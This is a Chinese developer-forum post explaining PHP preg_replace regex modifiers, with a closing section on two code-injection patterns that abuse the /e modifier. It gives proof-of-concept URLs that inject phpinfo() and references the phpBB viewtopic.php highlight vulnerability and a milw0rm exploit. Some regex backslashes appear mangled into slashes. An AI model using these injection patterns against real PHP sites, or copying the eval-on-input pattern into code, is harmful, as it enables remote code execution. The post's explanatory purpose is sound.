关于preg_replace函数的问题讲解-阿里云开发者社区

开发者社区> 安全> 正文
登录阅读全文

关于preg_replace函数的问题讲解

简介: http://www.jb51.net/article/8676.htm 请问下那此句语句的作用。

http://www.jb51.net/article/8676.htm

请问下那此句语句的作用。给我解释一下其中的“?”,“e","i","s"符号分别是什么意思,和它们起到了什么作用。还有就是除了"/eis”外还有其他什么模式了吗?
如果有相关的学习资料可以给我吗?谢谢,各位的帮助!谢谢。
$post=preg_replace("//[html/](.+?)/[//html/]/eis","htmlcode('//1')",$post);
修饰符:
正则表达式里面的修饰符可以改变正则的很多特性,使得正则表达式更加适合你的需要(注意:修饰符对于大小写是敏感的,这意味着"e"并不等于"E")。正则表达式里面的修饰符如下:
i :如果在修饰符中加上"i",则正则将会取消大小写敏感性,即"a"和"A" 是一样的。
m:默认的正则开始"^"和结束"$"只是对于正则字符串如果在修饰符中加上"m",那么开始和结束将会指字符串的每一行:每一行的开头就是"^",结尾就是"$"。
s:如果在修饰符中加入"s",那么默认的"."代表除了换行符以外的任何字符将会变成任意字符,也就是包括换行符!
x:如果加上该修饰符,表达式中的空白字符将会被忽略,除非它已经被转义。
e:本修饰符仅仅对于replacement有用,代表在replacement中作为PHP代码。
A:如果使用这个修饰符,那么表达式必须是匹配的字符串中的开头部分。比如说"/a/A"匹配"abcd"。
E:与"m"相反,如果使用这个修饰符,那么"$"将匹配绝对字符串的结尾,而不是换行符前面,默认就打开了这个模式。
U:和问号的作用差不多,用于设置"贪婪模式"。
?表单非贪婪匹配,即尽可能少的匹配

 

#############
##总结模型###
#############
1.直接在preg_replace第2个变量执行的模式:
echo preg_replace("/test/e",$h,"jutst test");
?>
提交http://127.0.0.1/test/11/preg.php?h=phpinfo()
实例如:phpbb的viewtopic.php变量$highliht_match提交php代码执行漏洞

2.通过//1[或者//n]提取第3个变量里的php代码并执行的模式:
echo preg_replace("//s*/[php/](.+?)/[//php/]/s*/ies", "//1", $h);
?>
提交:http://127.0.0.1/test/11/preg.php?h=[php]phpinfo()[/php]

参考:
r57的exp:http://www.milw0rm.com/exploits/1720
http://superhei.blogbus.com/logs/2398452.html

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

分享: